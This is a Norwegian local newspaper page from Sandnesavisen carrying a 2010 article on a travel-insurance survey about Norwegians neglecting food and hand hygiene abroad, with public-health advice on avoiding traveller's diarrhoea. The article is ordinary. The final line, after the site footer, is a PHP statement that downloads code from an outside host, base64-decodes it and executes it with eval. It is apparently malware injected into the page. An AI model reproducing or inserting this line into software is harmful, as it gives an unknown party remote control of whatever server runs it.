GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
26. juni 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vr - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bker
Musikk
Film
Byen vr
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrtt
Figgjo
Ganddal
Hana
Hle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Hndball
Kultur
Politikk
konomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Bt
Tog
Glemmer hygienen i utlandet
Skrevet av Atle Stava   
mandag 19. juli 2010

(NW) En av tre er ikke nøye med hva de spiser og drikker i utlandet, viser Reiseundersøkelsen 2010 fra Europeiske Reiseforsikring. Hver tiende nordmann som ferierer utenfor Skandinavia får diaré.

Når vi er i utlandet, tar hver tredje av oss ikke flere forholdsregler enn hjemme i forhold til hva vi spiser og drikker. En like stor andel vasker ikke hendene særlig oftere heller.

Det går fram av Reiseundersøkelsen 2010, som TNS Gallup har laget for Europeiske Reiseforsikring. Det er størst sjanse for å bli syk i land som Egypt, Mexico og India. Tyrkia er imidlertid et mer populært reisemål for nordmenn om sommeren, så det er særlig herfra Europeiske får meldinger om syke nordmenn for tiden.

450 mill. i do
– Det er høyst beklagelig at så mange ikke tar hygienerådene på alvor. Det er nok også mye av forklaringen på hvorfor så mange blir syke. Jo lenger vekk fra vestlig sivilisasjon du drar, desto viktigere blir det å følge rådene, sier lege og fagmedisinsk direktør Sverre Kjølstad i Europeiske Reiseforsikring.

De fleste som blir syke med oppkast og diaré oppsøker ikke lege. Forsikringsbransjen antar at minst 150 000 av oss får det i løpet av ferieturen. Det er hver tiende nordmann.

– Regner man at sykdommen i gjennomsnitt varer i to dager og at hver feriedag koster 1500 kroner, betyr det at 450 millioner kroner hvert år bokstavelig talt går i dass, sier Kjølstad.

Diaré er hyppigste årsak til sykehusinnleggelse under ferieopphold utenfor Skandinavia.

Kok og stek
Smittestoffene i dårlig mat og forurenset vann drepes ved koking og steking. Hvis maten blir stående lunken, eller ikke blir varmet opp godt nok, kan den også forårsake sykdom.

– Unngå uvasket salat og halvstekt eller rått kjøtt. Du bør også være på vakt mot kalde sauser, upasteuriserte melkeprodukter, iskrem som ikke er meieripakket, og mat tilberedt av rå egg, som majones og forskjellige desserter, sier seniorrådgiver Berit Tafjord Heier i Folkehelseinstituttet.

Hun er ikke overrasket over at hver tredje slurver med hygienen og matrådene i utlandet.

– Det er vel en viktig grunn til at for eksempel 70-80 prosent av salmonellatilfellene i Norge er smittet i utlandet, sier hun.

Du kan trygt spise gjennomkokt eller gjennomstekt mat som nettopp er tilberedt og fortsatt er varm. Frukt og grønnsaker som du vasker eller skreller selv, er også greit.

Det frarådes vanligvis å drikke vann fra springen. Du bør også vurdere å si nei takk til isbiter i colaen. Isbiter fra forurenset vann er velkjent som smittekilde.

– Men personlig hygiene er mye viktigere enn isbiter. Vask alltid hendene godt etter toalettbesøk og før du spiser. Bruk gjerne desinfiserende middel eller våtservietter, ser Tafjord Heier.

Oppdragende influensa
Legen i Europeiske Reiseforsikring tror svineinfluensaen kan ha bedret håndhygienen i år.

– Mange fikk et fortrolig forhold til desinfiserende middel og våtservietter i høst, noe som faktisk kan komme til å få en positiv effekt på årets ferieavvikling sett under ett, sier Sverre Kjølstad.

Hver sjuende nordmann har hatt nærkontakt med reisesyke i løpet av det siste året, viser undersøkelsen til Europeiske Reiseforsikring, enten ved at de selv er blitt syke eller at noen i reisefølget er blitt det.

De fleste som reiser i Europa eller til Nord-Amerika holder seg friske turen gjennom.

Annerledes er det for de som drar sørover eller østover. Verst er det i Egypt, Mellom- og Sør-Amerika, Karibia, Thailand og Asia for øvrig. Hver tredje nordmann som ferierte her det siste året, fikk mageproblemer.

– Hittil i sommer har Tyrkia pekt seg ut med mange sykehusinnleggelser av nordmenn med mageinfeksjoner. Antallet reflekterer nok at Tyrkia er et favorittreisemål om sommeren, sier Sverre Kjølstad i Europeiske Reiseforsikring.

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));